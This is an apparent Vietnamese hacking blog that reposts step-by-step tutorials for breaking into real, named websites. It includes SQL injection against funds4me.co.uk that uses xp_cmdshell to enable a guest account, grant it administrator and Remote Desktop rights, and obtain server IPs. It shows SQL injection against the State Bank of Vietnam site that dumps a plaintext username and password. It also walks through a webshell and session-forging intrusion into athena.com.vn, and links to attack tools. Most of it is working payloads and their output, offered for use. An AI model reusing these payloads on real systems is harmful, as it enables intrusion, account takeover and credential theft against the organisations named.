Thứ Hai, 7 tháng 3, 2011

Remote desktop via user "sa"-sql injection ! 05-20-2007, 04:47 PM

Thấy nhiều người hỏi cái này, mạn phép làm cái live show luôn ha
Link bug:

Code:
http://www.funds4me.co.uk/stores.asp?catID=43'
+Check user:
Code:
http://www.funds4me.co.uk/stores.asp?catID=43'%20and%201=convert(int,system_user)--sp_password
Dính SA goài:68:
Trích:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'sa' to a column of data type int.
+Check ip srv:
Đầu tiên đổ kết quả của lệnh ipconfig vào table keke:
Code:
http://www.funds4me.co.uk/stores.asp?catID=43';drop%20table%20keke%20create%20table%20keke%20(id%20int%20identity,nd%20varchar(1000))%20insert%20into%20keke(nd)%20exec%20master..xp_cmdshell%20'ipconfig'--sp_password
Sau đó convert ra xem kq thoai:
Code:
http://www.funds4me.co.uk/stores.asp?catID=43'%20and%201=convert(int,(select%20top%201%20nd%20from%20keke%20where%20nd%20like%20('%25Ip%20address%25')))--sp_password
Ra ip thật nè:
Trích:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 212.69.230.65 ' to a column of data type int.
+Add user và nâng quyền rồi tìm cách remote desktop vào:
Ở đây tôi chọn giải pháp active acc guest và nâng guest lên admin cho đỡ bị lộ

Active guest acc:
Code:
http://www.funds4me.co.uk/stores.asp?catID=43';exec master..xp_cmdshell 'net user guest /active:yes';--sp_password
Set lại pass cho guest
Code:
http://www.funds4me.co.uk/stores.asp?catID=43';exec master..xp_cmdshell 'net user guest xxxxxx';--sp_password
Add guest vào admin group:
Code:
http://www.funds4me.co.uk/stores.asp?catID=43';exec master..xp_cmdshell 'net localgroup administrators guest /add';--sp_password
Chắc nữa là add guest vào Remote Desktop group:

Code:
http://www.funds4me.co.uk/stores.asp?catID=43';exec master..xp_cmdshell 'net localgroup "Remote Desktop Users" guest /add';--sp_password
Dùng Remote Desktop vào srv 212.69.230.65 với acc guest/xxxxxx thôi
(pass đã change, ai thik thì tự tạo lại)

P/S:cái này mà tạo Virtual Private Srv fake ip rất good, hoặc để crack md5 pass hash
Thân!
Người đăng: vinakid vào lúc Thứ Hai, tháng 3 07, 2011 0 nhận xét
Nhãn:

Ngân hàng nhà nước Việt Nam bị hack như thế nào ?? 07-19-2006, 05:33 PM

Hacked by langtuhaohoa ( thx my friend WinDak )

hề hề ! Tại nghe đâu phong phanh là " Ngân Hàng Nhà Nước Việt Nam ( www.sbv.gov.vn )" bị dính Sql inject ... thấy chữ ngân hàng cũng tính mò dô xem xem thế nào  lượng đi lượn lại vài dòng thấy chã có url nào khai thác được cả ... ! híc ! Thấy nãn nãn... !

Đang xem thì thấy mấy cái input dạng select .... nhìn nhìn hồi nghĩ thôi thữ đại xem sao  biết đâu được
Chọn đại cái : http://www.sbv.gov.vn/home/hethongTCTDHT.asp

thấy cái select Tỉnh/Thành Phố ... thữ xem sao ! View source thấy 1 form như thế này :

Code:
<form name="Tim" method="post" action="hethongTCTDHT.asp" autocomplete="on"> 

<p align="right">Tỉnh / Thành phố:
 
        <select size="1" name="lstTinh" style="font-family: Times New Roman; background-color:#FFFFFF; font-size:12pt" onchange="document.Tim.submit()">
        <option value="ALL">Tất cả các tỉnh thành</option>
        
        <option value="DANANG">Đà Nẵng</option>
         
        <option value="DACLAC">Đắc Lắc</option>
         
        <option value="DACNONG">Đắc Nông</option>
         
        <option value="DONGNAI">Đồng Nai</option>

         
        <option value="DONGTHAP">Đồng Tháp</option>
         
        <option value="ANGIANG">An Giang</option>
         
        <option value="BARIAVUNGTAU">Bà Rịa-Vũng Tàu</option>
         
        <option value="BINHDINH">Bình Định</option>
         
        <option value="BINHDUONG">Bình Dương</option>
         
        <option value="BINHPHUOC">Bình Phước</option>

         
        <option value="BINHTHUAN">Bình Thuận</option>
         
        <option value="BACLIEU">Bạc Liêu</option>
         
        <option value="BACCAN">Bắc Cạn</option>
         
        <option value="BACGIANG">Bắc Giang</option>
         
        <option value="BACNINH">Bắc Ninh</option>
         
        <option value="BENTRE">Bến Tre</option>

         
        <option value="CAMAU">Cà Mau</option>
         
        <option value="CAOBANG">Cao Bằng</option>
         
        <option value="GIALAI">Gia Lai</option>
         
        <option value="HAGIANG">Hà Giang</option>
         
        <option value="HANOI">Hà Nội</option>
         
        <option value="HANAM">Hà Nam</option>

         
        <option value="HATAY">Hà Tây</option>
         
        <option value="HATINH">Hà Tĩnh</option>
         
        <option value="HAIDUONG">Hải Dương</option>
         
        <option value="HAIPHONG">Hải Phòng</option>
         
        <option value="HAUGIANG">Hậu Giang</option>
         
        <option value="HUNGYEN">Hưng Yên</option>

         
        <option value="HOABINH">Hoà Bình</option>
         
        <option value="KHANHHOA">Khánh Hoà</option>
         
        <option value="KIENGIANG">Kiên Giang</option>
         
        <option value="KONTUM">Kon Tum</option>
         
        <option value="LAOCAI">Lào Cai</option>
         
        <option value="LAMDONG">Lâm Đồng</option>

         
        <option value="LANGSON">Lạng Sơn</option>
         
        <option value="LAICHAU">Lai Châu</option>
         
        <option value="LONGAN">Long An</option>
         
        <option value="NAMDINH">Nam Định</option>
         
        <option value="NGHEAN">Nghệ An</option>
         
        <option value="NINHBINH">Ninh Bình</option>

         
        <option value="NINHTHUAN">Ninh Thuận</option>
         
        <option value="PHUTHO">Phú Thọ</option>
         
        <option value="PHUYEN">Phú Yên</option>
         
        <option value="QUANGBINH">Quảng Bình</option>
         
        <option value="QUANGNAM">Quảng Nam</option>
         
        <option value="QUANGNGAI">Quảng Ngãi</option>

         
        <option value="QUANGNINH">Quảng Ninh</option>
         
        <option value="QUANGTRI">Quảng Trị</option>
         
        <option value="SOCTRANG">Sóc Trăng</option>
         
        <option value="SONLA">Sơn La</option>
         
        <option value="TAYNINH">Tây Ninh</option>
         
        <option value="THAIBINH">Thái Bình</option>

         
        <option value="THAINGUYEN">Thái Nguyên</option>
         
        <option value="THUATHIENHUE">Thừa Thiên Huế</option>
         
        <option value="THANHHOA">Thanh Hoá</option>
         
        <option value="TIENGIANG">Tiền Giang</option>
         
        <option value="TPHCM">TP Hồ Chí Minh</option>
         
        <option value="TPHUE">TP Huế</option>

         
        <option value="TRAVINH">Trà Vinh</option>
         
         <option selected value="TW">Trung Ương</option>
         
        <option value="TUYENQUANG">Tuyên Quang</option>
         
        <option value="VINHLONG">Vĩnh Long</option>
         
        <option value="VINHPHUC">Vĩnh Phúc</option>
         
        <option value="YENBAI">Yên Bái</option>

          </select></p>
         </form>
oài ! thấy có cả daklak trong đó  ( quê nhà mà hê hê ) thôi thì thữ coppy về và edit 1 xí xem sao :

Code:
<form name="Tim" method="post" action="http://www.sbv.gov.vn/home/hethongTCTDHT.asp" autocomplete="on"> 
 
        <input type="text" size="100" name="lstTinh">
         <input name="submit" type="submit" value="submit">
         </form>
langtu save lại thành file test.html và mở ra type dô cái input vài dòng thữ xem sao :
Code:
' or 1=(@@version)--
và submit ... óe nó hiện ra cái gì đây :eek: :
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int.

/home/hethongTCTDHT.asp, line 172
hề hề ! Sql inject cực nặng rồi nhé ... ! back lại test.html lt type vào :

Trích:
'; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+table_name+'/' from information_schema.tables select @temp as id into langtu end--
Đoạn query trên có nghĩa là gì ?? declare @temp varchar(8000) là khai báo cho @temp rỗng và varchar(8000) ( cái này giống như kiểu khai báo biến trong các ngôn ngữ lập trình khác í mà ) tiếp theo là : set @temp='' select @temp=@temp+table_name+'/' from information_schema.tables cái này là đặt điều kiện cho @temp seclect ra table và tiếp tục cộng thêm 1 table tiếp theo ngăn cách bằng " / " ! select @temp as id into langtu end-- chọn @temp ờ cột id và trong table langtu ! Chắc phần nào hiểu rồi chứ  hí hí !

Ok ! sau khi submit query trên ta sẽ được trả về http://www.sbv.gov.vn/home/hethongTCTDHT.asp và ko bị báo lỗi gì cả thì ta đã thành công !

Tiếp theo langtu sẽ select ra tất cả các table trong user data "dthai" mà sbv đang sữ dụng :
Code:
' or 1=(select id from langtu)--

Tự nhiên đang viết tut có hứng tới đây nó ra mẹ user + pass  khó hiểu quá ! Quyết tìm hiểu xem vì sao lại thế chứ...


Trích:
' or 1=(select id from langtu)--
ặc ặc ! Bây giờ thì mới đúng nè ... híc !
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'CacTCTD/cdeCNTH/cdeCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDNT/cdeCSTT_kqua_TPCP/cdeCSTT_kqua_TTM/cdeCSTT_LS/cdeCSTT_tbao_TPCP/cdeCSTT_tbao_TPKB/cdeKTTT/cdeQLNH_dienbienTG/CdeTCCB/cdeTTKS/DetaiNCKH/dtproperties/hoidap/nghiencuutraodoi/Ngoaite/QuyTDND/sukiennoibat/sysconstraints/syssegments/thongcaobaochi/TinhThanh/Tintuc/tuyentruyen/Tygiabinhquan/Tygi...

/home/hethongTCTDHT.asp, line 172
Tuy đã biết user + pass nhưng mình vẫn sẽ viết tiếp cho đúng cách làm việc của nó !
Bây giờ bạn hãy thữ nhìn lên cái error list ra các table coi ??? nó hiện ra ko đầy đủ đúng ko ?? cái :" Tygiabinhquan/Tygi... " có nghĩa là table nó dài quá ko list hết ra được !
hùhm,... giờ sao cho nó list hết ra nhĩ ??? OK langtu dùng substring

Trích:
' or 1=(select top 1 substring(id,1,100) from langtu)--
được :
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'CacTCTD/cdeCNTH/cdeCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDNT/cdeCSTT_kqua_TPCP/cdeCSTT_kqua_TTM/cd' to a column of data type int.

/home/hethongTCTDHT.asp, line 172
nó sẽ list ra 100 kí tự đầu tiên từ 1---> 100 :cool: Nhưng ta vấn chưa thấy table chứa user đâu cả  tiếp tục :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
Trích:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'eCSTT_LS/cdeCSTT_tbao_TPCP/cdeCSTT_tbao_TPKB/cdeKTTT/cdeQLNH_dienbienTG/CdeTCCB/cdeTTKS/DetaiNCKH/dtproperties/hoidap/nghiencuutraodoi/Ngoaite/QuyTDND/sukiennoibat/sysconstraints/syssegments/thongcaob' to a column of data type int.

/home/hethongTCTDHT.asp, line 172
óe ! vấn chưa thấy tiếp tục :
Trích:
' or 1=(select top 1 substring(id,201,300) from langtu)--
Được :
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'properties/hoidap/nghiencuutraodoi/Ngoaite/QuyTDND/sukiennoibat/sysconstraints/syssegments/thongcaobaochi/TinhThanh/Tintuc/tuyentruyen/Tygiabinhquan/Tygiacheo/TygiaVCB/Vanban/webgrand/webgroup/webuser/CacTCTD/cdeCNTH/cdeCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDNT/cdeCSTT_kqua_TPCP/cdeCSTT_kqua_TTM/c' to a column of data type int.

/home/hethongTCTDHT.asp, line 172
hè hè ! ta thấy table webuser rồi !

Bây giờ thì ta drop table langtu đi thôi : '; drop table langtu--

OK thành công ! Để lấy tất cả column trong table webuser ta lại tiếp tục insert 1 column @temp vào table webuser giống hồi nãy dậy ta ! type :

Trích:
'; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+column_name+'/' from information_schema.columns where table_name='webuser' select @temp as id into langtu end--
ko báo lỗi , tiếp tục : ' or 1=(select 1 from langtu)--

được :
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'uid/username/password/description/gid/grand/QL/uid/username/password/description/gid/grand/QL/' to a column of data type int.

/home/hethongTCTDHT.asp, line 172
drop table langtu đi và tiếp tục :
Trích:
'; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+username+':'+password+'/' from webuser select @temp as id into langtu end--
ko báo lỗi , giờ ta tiếp tục lấy user + pass : ' or 1=(select id from langtu)--

được :

Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'levietcuong :lvc123 /' to a column of data type int.

/home/hethongTCTDHT.asp, line 172
Bye bye good luck to hack !
Author : langtuhaohoa ( HCEGroup.net )
Người đăng: vinakid vào lúc Thứ Hai, tháng 3 07, 2011 0 nhận xét
Nhãn:

longnhi hack Athena.com.vn như thế nào ? 07-14-2006, 01:22 PM



Tóm tắt quá trình hack athena.com.vn
(Local attack)

Bỏ qua mấy giai đoạn lặt vặt bây giờ làm việc với trường hợp đã có sẵn con webshell //http://12a6dh.info/forum/cache/skin_cache/cacheid_2/skin_public.php

Chạy con backdoor trên kết nối vào mysql của 12a6 sau đó tiến hành lấy sources của athena. Trong trường hợp này xác định link của trang quản trị là /admin nên chỉ chú trọng vào việc lấy code của các file liên quan đến cái này thui (khi nào có con backdoor trên host của nó rùi lấy tiếp). Lấy code bằng mấy câu query sau:

CREATE TABLE test(text LONGTEXT);

load data local infile 'path/file' into table test FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\'' LINES TERMINATED BY '\n';

Có code rùi thì ngồi đọc nó, trước hết là thằng index.php

session_start(); // quản lý bằng session chứ ko phải bằng cookie, có nghĩa là khi ta vào link admin nó sẽ tạo cho ta một phiên làm việc, phiên làm việc này sẽ được server tạo ra và lưu vào file sess_...... (VD: sess_2d193503319fefd5a48b208d48b69d36) nằm trên server, mặc định của phiên làm việc này là ko hợp lệ nhưng nếu ta đăng nhập thành công thì server sẽ chỉnh sửa file sess_ kia thành hợp lệ (hack được athena phải cảm ơn thằng này nhiều ). Tiếp tục nào case 'login' : include "_login.php"; break; thằng index sơ sơ như vậy là được rùi bây giờ chuyển sang thằng _login.php

if (isset($_POST['txtUsername'])) $admin_user=$_POST['txtUsername']; else $admin_user='';
if (isset($_POST['txtPassword'])) $admin_pass=$_POST['txtPassword']; else $admin_pass='';
if (isset($_POST['txtPassSec'])) $admin_sec=$_POST['txtPassSec']; else $admin_sec='';

hô hô user, pass1, pass2.

$admin_sec = md5(base64_encode($admin_sec));

if ($admin_sec == "53f8797e875fb1b667c86e4ae15cee24") {
if ( (!empty($admin_user)) && (!empty($admin_pass)) )
{
$admin_pass = md5($admin_pass);
$query = "select * from admin WHERE username='$admin_user' AND password='$admin_pass'";

ặc ặc cái pass2 của nó vừa base64_encode vừa md5, nó mà đặt pass dài xíu là ngồi decode đù người luôn mà chưa chắc gì có kết quả, còn cái pass1 cũng bị md5 luôn.

Có 2 cách giải quyết được đặt ra, thứ nhất là dò 2 cái pass của nó, thứ 2 là fake cookie. Cách thứ nhất ko chơi, ngu gì mà ngồi dò pass trong khi cách thứ 2 có vẻ dễ ăn hơn và khả năng thành công cũng cao hơn. Hồi nãy coi file index thấy nó quản lý phiên làm việc bằng session coi bộ ngon ăn. Vậy là quyết định chọn cách 2.

Có 2 hướng giải quyết cho cách 2:
+ Thứ nhất là khi ta mở trang index.php ra nó sẽ tạo cho ta một session trên server, công việc của ta là tìm cách edit cái phiên làm việc sao cho nó trở thành hợp lệ. Coi cái phpinfo() của nó xem nào session.save_path=/tmp. Ok rùi mở cái thư mục /tmp coi thử có gì trong đó. Ặc ặc …. bị access denied rùi coi bộ hướng đi này ko ổn, chuyển hướng đi thui.
+ Thứ hai nếu ta edit cái file session ko được thì tại sao ta ko tạo ra một cái file session mới hợp lệ với cái source đã có kia rùi fake cookie của web browser với cái session mới đó. Vậy là đã xác định được chính xác hướng đi và những cái cần phải làm, công việc tiếp theo là up sources của athena lên host 12a6, edit lại cái pass2 trong file _login.php, edit cái pass1 trong db của nó, xong rùi login nào … vừng ơi mở ra…. bùm vào được admin control panel rùi (cái này là đồ giả nằm trên host của 12a6) vào phần quản lý cookie của web browsers (opera) coi thử cái session của nó là gì nào, copy nó lại bây giờ chuyển qua thằng athena fake bằng cái session đó, refresh lại nào …. bùm …. he he heeeeee vào được admin control panel của athena rùi (hàng thật chất lượng cao ), tìm chỗ up con shell…..


GAME OVER

Author: longnhi
Người đăng: vinakid vào lúc Thứ Hai, tháng 3 07, 2011 0 nhận xét
Nhãn:

Local decode zend

[+] video chiến site decode zend
http://www.mediafire.com/?ifjjub4cos8384a
Người đăng: vinakid vào lúc Thứ Hai, tháng 3 07, 2011 0 nhận xét
Nhãn:

Kho video

[+]  2 Kho video từ cổ chí kim

http://www.mediafire.com/mafia

http://www.mediafire.com/?pm55krbicizbc 
Người đăng: vinakid vào lúc Thứ Hai, tháng 3 07, 2011 0 nhận xét
Nhãn:

video local server 112.213.89.35 by vinakid

[+] video local server 112.213.89.35 by vinakid

http://www.mediafire.com/?l9508poihpfuqm4
Người đăng: vinakid vào lúc Thứ Hai, tháng 3 07, 2011 0 nhận xét
Nhãn:

Havij 1.12 Pro

Tools này khai thác SQL injection tốt nhất,và theo mình bản này chạy ỗn định nhất

http://www.mediafire.com/?8ia5l33g4mwdeyj
Người đăng: vinakid vào lúc Thứ Hai, tháng 3 07, 2011 0 nhận xét
Nhãn:
Đăng ký: Bài đăng (Atom)